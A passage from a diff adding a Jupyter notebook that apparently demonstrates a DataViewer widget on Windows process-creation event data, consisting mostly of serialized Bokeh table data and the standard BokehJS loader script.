QgBQcfb+hHZCABC29v6EdkIAQLb2/oR2QgCQuPb+hHZCADC/9v6EdkIAIML2/oR2QgAQxfb+hHZCAFDH9v6EdkIAAMn2/oR2QgAgzPb+hHZCAMDM9v6EdkIAINH2/oR2QgAA7Pb+hHZCADDw9v6EdkIAYPX2/oR2QgCgFL38hHZCALAVvfyEdkIA0HK9/IR2QgAAkb38hHZCAKD/e/2EdkIAACiK/YR2QgAQKYr9hHZCANCRiv2EdkIAoKWK/YR2QgAwn5H8hHZCAPAyk/yEdkIA8Pj2/oR2QgDA+fb+hHZCAAD79v6EdkIAEPz2/oR2QgAwAPf+hHZCACAD9/6EdkIAQAb3/oR2QgAwCff+hHZCAJAJ9/6EdkIAYA73/oR2QgDgEPf+hHZCADAT9/6EdkIAIBf3/oR2QgBAGvf+hHZCADAd9/6EdkIAUCD3/oR2QgBwI/f+hHZCACAm9/6EdkIAQCn3/oR2QgBwLff+hHZCAMAw9/6EdkIAcDP3/oR2QgCQOvf+hHZCALA+9/6EdkIAcEH3/oR2QgAgRPf+hHZCABBH9/6EdkIA8En3/oR2QgAQTPf+hHZCAPCK9/6EdkIA0Nv4/oR2QgAQ7/X+hHZCAEDz9f6EdkIA0Pb1/oR2QgAw+/X+hHZCAFD/9f6EdkIAkAT2/oR2QgBQCfb+hHZCAFAJ9v6EdkIAoAv2/oR2QgDQC/b+hHZCADAQ9v6EdkIAUBP2/oR2QgAAFfb+hHZCAFAY9v6EdkIAIB32/oR2QgAAX2b+hHZCAACIdP6EdkIAsIp0/oR2QgCg9nT+hHZCAAAFdf6EdkIAoMif/IR2QgDgyZ/8hHZCAPAqoPyEdkIAAEWg/IR2QgAAbxz8hHZCAACYKvyEdkIAEJkq/IR2QgCQCiv8hHZCAHAVK/yEdkIAAM8G/YR2QgAA+BT9hHZCABD5FP2EdkIAsE4V/YR2QgDQURX9hHZCAHB1Ff2EdkIAgAkf/YR2QgBQCh/9hHZCAAAbJP2EdkIAAIvE+4R2QgAAtNL7hHZCABC10vuEdkIA8AzT+4R2QgBwMdP7hHZCAABTdPyEdkIAoHyC/IR2QgCwfYL8hHZCACDjgvyEdkIAAPmC/IR2QgAAuzn8hHZCANBmQvyEdkIAMORH/IR2QgBA5Uf8hHZCAKBSSPyEdkIA0GFI/IR2QgAgHEr8hHZCAABDvv6EdkIAcGzM/oR2QgBwbcz+hHZCALDDzP6EdkIAYM/M/oR2QgAw6cz+hHZCAKAHV/yEdkIAcDBl/IR2QgBwMWX8hHZCAOCaZfyEdkIAAK1l/IR2QgAwBAf/hHZCAEAFB/+EdkIA0F4H/4R2QgBwgQf/hHZCAAAj//uEdkIA8E8D/IR2QgAATA38hHZCABBNDfyEdkIAsJ0N/IR2QgAAyQ38hHZCAABEMv2EdkIAEEUy/YR2QgCwuDL9hHZCAHDBMv2EdkIAwHs1/YR2QgCQfDX9hHZCAADX4fuEdkIAEAHw+4R2QgDgAfD7hHZCAABV8PuEdkIAoH3w+4R2QgAA84n7hHZCAHAcmPuEdkIAsB2Y+4R2QgDgfJj7hHZCAACZmPuEdkIAcOhe/4R2QgBw6V7/hHZCAHBcX/+EdkIAcGVf/4R2QgAAC27/hHZCAABLmf2EdkIAAHSn/YR2QgBAdaf9hHZCANDYp/2EdkIA0PGn/YR2QgAQfA7+hHZCADCkHP6EdkIAEKUc/oR2QgAw+Rz+hHZCAAAhHf6EdkIAABNJ/oR2QgAAPFf+hHZCAEA9V/6EdkIA0K5X/oR2QgBwuVf+hHZCAHDHK/6EdkIAAEgy/oR2QgAA8Dn+hHZCALDxOf6EdkIA0EA6/oR2QgAwbTr+hHZCAED6Ov6EdkIA4Po6/oR2QgAA49P9hHZCADAM4v2EdkIAQA3i/YR2QgAgaeL9hHZCAACJ4v2EdkIAAJe2/YR2QgAwwMT9hHZCAEDBxP2EdkIAUCHF/YR2QgBwPcX9hHZCAAAv8f2EdkIA0Fj//YR2QgDgWf/9hHZCADCx//2EdkIAoNX//YR2QgCwCkH9hHZCAHBnQf2EdkIA0O1B/YR2QgAQkU/9hHZCABCST/2EdkIAgABQ/YR2QgBwDVD9hHZC\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[363]},\"TokenElevationType\":[\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\"],\"index\":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,338,339,340,341,342,343,344,345,346,347,348,349,350,351,352,353,354,355,356,357,358,359,360,361,362]},\"selected\":{\"id\":\"1026\"},\"selection_policy\":{\"id\":\"1027\"}},\"id\":\"1002\",\"type\":\"ColumnDataSource\"},{\"attributes\":{},\"id\":\"1057\",\"type\":\"StringFormatter\"},{\"attributes\":{\"editor\":{\"id\":\"1048\"},\"field\":\"NewProcessName\",\"formatter\":{\"id\":\"1047\"},\"title\":\"NewProcessName\",\"width\":52},\"id\":\"1012\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1045\",\"type\":\"StringFormatter\"},{\"attributes\":{\"editor\":{\"id\":\"1046\"},\"field\":\"NewProcessId\",\"formatter\":{\"id\":\"1045\"},\"title\":\"NewProcessId\",\"width\":5},\"id\":\"1011\",\"type\":\"TableColumn\"},{\"attributes\":{\"editor\":{\"id\":\"1038\"},\"field\":\"SubjectUserSid\",\"formatter\":{\"id\":\"1037\"},\"title\":\"SubjectUserSid\",\"width\":8},\"id\":\"1007\",\"type\":\"TableColumn\"},{\"attributes\":{\"editor\":{\"id\":\"1054\"},\"field\":\"CommandLine\",\"formatter\":{\"id\":\"1053\"},\"title\":\"CommandLine\",\"width\":125},\"id\":\"1015\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1033\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1044\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1034\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1036\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1038\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1048\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1055\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1061\",\"type\":\"StringFormatter\"},{\"attributes\":{\"editor\":{\"id\":\"1062\"},\"field\":\"TimeCreatedUtc\",\"formatter\":{\"id\":\"1061\"},\"title\":\"TimeCreatedUtc\",\"width\":23},\"id\":\"1019\",\"type\":\"TableColumn\"}],\"root_ids\":[\"1024\"]},\"title\":\"Bokeh Application\",\"version\":\"2.3.2\"}};\n",
+       "  var render_items = [{\"docid\":\"10ccfc77-fc95-462a-a396-e33a049da5d1\",\"notebook_comms_target\":\"1063\",\"root_ids\":[\"1024\"],\"roots\":{\"1024\":\"5705a6d0-1bca-4c2f-ad12-bc65f08f3497\"}}];\n",
+       "  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n",
+       "\n",
+       "  }\n",
+       "  if (root.Bokeh !== undefined) {\n",
+       "    embed_document(root);\n",
+       "  } else {\n",
+       "    var attempts = 0;\n",
+       "    var timer = setInterval(function(root) {\n",
+       "      if (root.Bokeh !== undefined) {\n",
+       "        clearInterval(timer);\n",
+       "        embed_document(root);\n",
+       "      } else {\n",
+       "        attempts++;\n",
+       "        if (attempts > 100) {\n",
+       "          clearInterval(timer);\n",
+       "          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n",
+       "        }\n",
+       "      }\n",
+       "    }, 10, root)\n",
+       "  }\n",
+       "})(window);"
+      ],
+      "application/vnd.bokehjs_exec.v0+json": ""
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "1024"
+      }
+     },
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "a67b7cf6035d467184274b9aa4ccfea2",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "Accordion(children=(VBox(children=(VBox(children=(Text(value='', description='Filter:', style=DescriptionStyle…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "DataViewer(data)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Specify an initial set of columns"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 3,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "application/javascript": [
+       "\n",
+       "(function(root) {\n",
+       "  function now() {\n",
+       "    return new Date();\n",
+       "  }\n",
+       "\n",
+       "  var force = true;\n",
+       "\n",
+       "  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n",
+       "    root._bokeh_onload_callbacks = [];\n",
+       "    root._bokeh_is_loading = undefined;\n",
+       "  }\n",
+       "\n",
+       "  var JS_MIME_TYPE = 'application/javascript';\n",
+       "  var HTML_MIME_TYPE = 'text/html';\n",
+       "  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n",
+       "  var CLASS_NAME = 'output_bokeh rendered_html';\n",
+       "\n",
+       "  /**\n",
+       "   * Render data to the DOM node\n",
+       "   */\n",
+       "  function render(props, node) {\n",
+       "    var script = document.createElement(\"script\");\n",
+       "    node.appendChild(script);\n",
+       "  }\n",
+       "\n",
+       "  /**\n",
+       "   * Handle when an output is cleared or removed\n",
+       "   */\n",
+       "  function handleClearOutput(event, handle) {\n",
+       "    var cell = handle.cell;\n",
+       "\n",
+       "    var id = cell.output_area._bokeh_element_id;\n",
+       "    var server_id = cell.output_area._bokeh_server_id;\n",
+       "    // Clean up Bokeh references\n",
+       "    if (id != null && id in Bokeh.index) {\n",
+       "      Bokeh.index[id].model.document.clear();\n",
+       "      delete Bokeh.index[id];\n",
+       "    }\n",
+       "\n",
+       "    if (server_id !== undefined) {\n",
+       "      // Clean up Bokeh references\n",
+       "      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n",
+       "      cell.notebook.kernel.execute(cmd, {\n",
+       "        iopub: {\n",
+       "          output: function(msg) {\n",
+       "            var id = msg.content.text.trim();\n",
+       "            if (id in Bokeh.index) {\n",
+       "              Bokeh.index[id].model.document.clear();\n",
+       "              delete Bokeh.index[id];\n",
+       "            }\n",
+       "          }\n",
+       "        }\n",
+       "      });\n",
+       "      // Destroy server and session\n",
+       "      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n",
+       "      cell.notebook.kernel.execute(cmd);\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "  /**\n",
+       "   * Handle when a new output is added\n",
+       "   */\n",
+       "  function handleAddOutput(event, handle) {\n",
+       "    var output_area = handle.output_area;\n",
+       "    var output = handle.output;\n",
+       "\n",
+       "    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n",
+       "    if ((output.output_type != \"display_data\") || (!Object.prototype.hasOwnProperty.call(output.data, EXEC_MIME_TYPE))) {\n",
+       "      return\n",
+       "    }\n",
+       "\n",
+       "    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n",
+       "\n",
+       "    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n",
+       "      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n",
+       "      // store reference to embed id on output_area\n",
+       "      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n",
+       "    }\n",
+       "    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n",
+       "      var bk_div = document.createElement(\"div\");\n",
+       "      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n",
+       "      var script_attrs = bk_div.children[0].attributes;\n",
+       "      for (var i = 0; i < script_attrs.length; i++) {\n",
+       "        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n",
+       "        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n",
+       "      }\n",
+       "      // store reference to server id on output_area\n",
+       "      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "  function register_renderer(events, OutputArea) {\n",
+       "\n",
+       "    function append_mime(data, metadata, element) {\n",
+       "      // create a DOM node to render to\n",
+       "      var toinsert = this.create_output_subarea(\n",
+       "        metadata,\n",
+       "        CLASS_NAME,\n",
+       "        EXEC_MIME_TYPE\n",
+       "      );\n",
+       "      this.keyboard_manager.register_events(toinsert);\n",
+       "      // Render to node\n",
+       "      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n",
+       "      render(props, toinsert[toinsert.length - 1]);\n",
+       "      element.append(toinsert);\n",
+       "      return toinsert\n",
+       "    }\n",
+       "\n",
+       "    /* Handle when an output is cleared or removed */\n",
+       "    events.on('clear_output.CodeCell', handleClearOutput);\n",
+       "    events.on('delete.Cell', handleClearOutput);\n",
+       "\n",
+       "    /* Handle when a new output is added */\n",
+       "    events.on('output_added.OutputArea', handleAddOutput);\n",
+       "\n",
+       "    /**\n",
+       "     * Register the mime type and append_mime function with output_area\n",
+       "     */\n",
+       "    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n",
+       "      /* Is output safe? */\n",
+       "      safe: true,\n",
+       "      /* Index of renderer in `output_area.display_order` */\n",
+       "      index: 0\n",
+       "    });\n",
+       "  }\n",
+       "\n",
+       "  // register the mime type if in Jupyter Notebook environment and previously unregistered\n",
+       "  if (root.Jupyter !== undefined) {\n",
+       "    var events = require('base/js/events');\n",
+       "    var OutputArea = require('notebook/js/outputarea').OutputArea;\n",
+       "\n",
+       "    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n",
+       "      register_renderer(events, OutputArea);\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "  \n",
+       "  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n",
+       "    root._bokeh_timeout = Date.now() + 5000;\n",
+       "    root._bokeh_failed_load = false;\n",
+       "  }\n",
+       "\n",
+       "  var NB_LOAD_WARNING = {'data': {'text/html':\n",
+       "     \"<div style='background-color: #fdd'>\\n\"+\n",
+       "     \"<p>\\n\"+\n",
+       "     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n",
+       "     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n",
+       "     \"</p>\\n\"+\n",
+       "     \"<ul>\\n\"+\n",
+       "     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n",
+       "     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n",
+       "     \"</ul>\\n\"+\n",
+       "     \"<code>\\n\"+\n",
+       "     \"from bokeh.resources import INLINE\\n\"+\n",
+       "     \"output_notebook(resources=INLINE)\\n\"+\n",
+       "     \"</code>\\n\"+\n",
+       "     \"</div>\"}};\n",
+       "\n",
+       "  function display_loaded() {\n",
+       "    var el = document.getElementById(null);\n",
+       "    if (el != null) {\n",
+       "      el.textContent = \"BokehJS is loading...\";\n",
+       "    }\n",
+       "    if (root.Bokeh !== undefined) {\n",
+       "      if (el != null) {\n",
+       "        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n",
+       "      }\n",
+       "    } else if (Date.now() < root._bokeh_timeout) {\n",
+       "      setTimeout(display_loaded, 100)\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "\n",
+       "  function run_callbacks() {\n",
+       "    try {\n",
+       "      root._bokeh_onload_callbacks.forEach(function(callback) {\n",
+       "        if (callback != null)\n",
+       "          callback();\n",
+       "      });\n",
+       "    } finally {\n",
+       "      delete root._bokeh_onload_callbacks\n",
+       "    }\n",
+       "    console.debug(\"Bokeh: all callbacks have finished\");\n",
+       "  }\n",
+       "\n",
+       "  function load_libs(css_urls, js_urls, callback) {\n",
+       "    if (css_urls == null) css_urls = [];\n",
+       "    if (js_urls == null) js_urls = [];\n",
+       "\n",
+       "    root._bokeh_onload_callbacks.push(callback);\n",
+       "    if (root._bokeh_is_loading > 0) {\n",
+       "      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n",
+       "      return null;\n",
+       "    }\n",
+       "    if (js_urls == null || js_urls.length === 0) {\n",
+       "      run_callbacks();\n",
+       "      return null;\n",
+       "    }\n",
+       "    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n",
+       "    root._bokeh_is_loading = css_urls.length + js_urls.length;\n",
+       "\n",
+       "    function on_load() {\n",
+       "      root._bokeh_is_loading--;\n",
+       "      if (root._bokeh_is_loading === 0) {\n",
+       "        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n",
+       "        run_callbacks()\n",
+       "      }\n",
+       "    }\n",
+       "\n",
+       "    function on_error(url) {\n",
+       "      console.error(\"failed to load \" + url);\n",
+       "    }\n",
+       "\n",
+       "    for (let i = 0; i < css_urls.length; i++) {\n",
+       "      const url = css_urls[i];\n",
+       "      const element = document.createElement(\"link\");\n",
+       "      element.onload = on_load;\n",
+       "      element.onerror = on_error.bind(null, url);\n",
+       "      element.rel = \"stylesheet\";\n",
+       "      element.type = \"text/css\";\n",
+       "      element.href = url;\n",
+       "      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n",
+       "      document.body.appendChild(element);\n",
+       "    }\n",
+       "\n",
+       "    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\": \"XypntL49z55iwGVUW4qsEu83zKL3XEcz0MjuGOQ9SlaaQ68X/g+k1FcioZi7oQAc\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\": \"bEsM86IHGDTLCS0Zod8a8WM6Y4+lafAL/eSiyQcuPzinmWNgNO2/olUF0Z2Dkn5i\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\": \"TX0gSQTdXTTeScqxj6PVQxTiRW8DOoGVwinyi1D3kxv7wuxQ02XkOxv0xwiypcAH\"};\n",
+       "\n",
+       "    for (let i = 0; i < js_urls.length; i++) {\n",
+       "      const url = js_urls[i];\n",
+       "      const element = document.createElement('script');\n",
+       "      element.onload = on_load;\n",
+       "      element.onerror = on_error.bind(null, url);\n",
+       "      element.async = false;\n",
+       "      element.src = url;\n",
+       "      if (url in hashes) {\n",
+       "        element.crossOrigin = \"anonymous\";\n",
+       "        element.integrity = \"sha384-\" + hashes[url];\n",
+       "      }\n",
+       "      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n",
+       "      document.head.appendChild(element);\n",
+       "    }\n",
+       "  };\n",
+       "\n",
+       "  function inject_raw_css(css) {\n",
+       "    const element = document.createElement(\"style\");\n",
+       "    element.appendChild(document.createTextNode(css));\n",
+       "    document.body.appendChild(element);\n",
+       "  }\n",
+       "\n",
+       "  \n",
+       "  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\"];\n",
+       "  var css_urls = [];\n",
+       "  \n",
+       "\n",
+       "  var inline_js = [\n",
+       "    function(Bokeh) {\n",
+       "      Bokeh.set_log_level(\"info\");\n",
+       "    },\n",
+       "    function(Bokeh) {\n",
+       "    \n",
+       "    \n",
+       "    }\n",
+       "  ];\n",
+       "\n",
+       "  function run_inline_js() {\n",
+       "    \n",
+       "    if (root.Bokeh !== undefined || force === true) {\n",
+       "      \n",
+       "    for (var i = 0; i < inline_js.length; i++) {\n",
+       "      inline_js[i].call(root, root.Bokeh);\n",
+       "    }\n",
+       "    } else if (Date.now() < root._bokeh_timeout) {\n",
+       "      setTimeout(run_inline_js, 100);\n",
+       "    } else if (!root._bokeh_failed_load) {\n",
+       "      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n",
+       "      root._bokeh_failed_load = true;\n",
+       "    } else if (force !== true) {\n",
+       "      var cell = $(document.getElementById(null)).parents('.cell').data().cell;\n",
+       "      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n",
+       "    }\n",
+       "\n",
+       "  }\n",
+       "\n",
+       "  if (root._bokeh_is_loading === 0) {\n",
+       "    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n",
+       "    run_inline_js();\n",
+       "  } else {\n",
+       "    load_libs(css_urls, js_urls, function() {\n",
+       "      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n",
+       "      run_inline_js();\n",
+       "    });\n",
+       "  }\n",
+       "}(window));"
+      ],
+      "application/vnd.bokehjs_load.v0+json": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  \n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(null);\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls 